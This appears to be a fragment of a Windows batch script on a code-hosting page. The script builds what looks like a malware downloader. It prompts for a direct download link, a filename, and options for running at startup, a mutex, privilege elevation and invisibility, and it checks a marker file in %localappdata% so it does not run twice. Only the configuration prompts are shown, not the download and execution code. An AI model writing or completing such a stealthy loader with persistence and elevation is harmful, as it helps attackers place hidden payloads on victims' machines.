This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
:: Prepare Script | |
@echo off & cd "%localappdata%" & if exist i.db exit & set N=1 | |
:: Define Parameters | |
echo Specify Filename and Extension.& set /p "i1=" & cls | |
echo Specify Direct Download Link. & set /p "i2=" & cls | |
echo Run file on Startup? [Y/N] & set /p "i3=" & cls | |
echo Enable Mutex? [Y/N] & set /p "i4=" & cls | |
echo Enable Elevation? [Y/N] & set /p "i5=" & cls | |
echo Enable Invisibility? [Y/N] & set /p "i6=" & cls |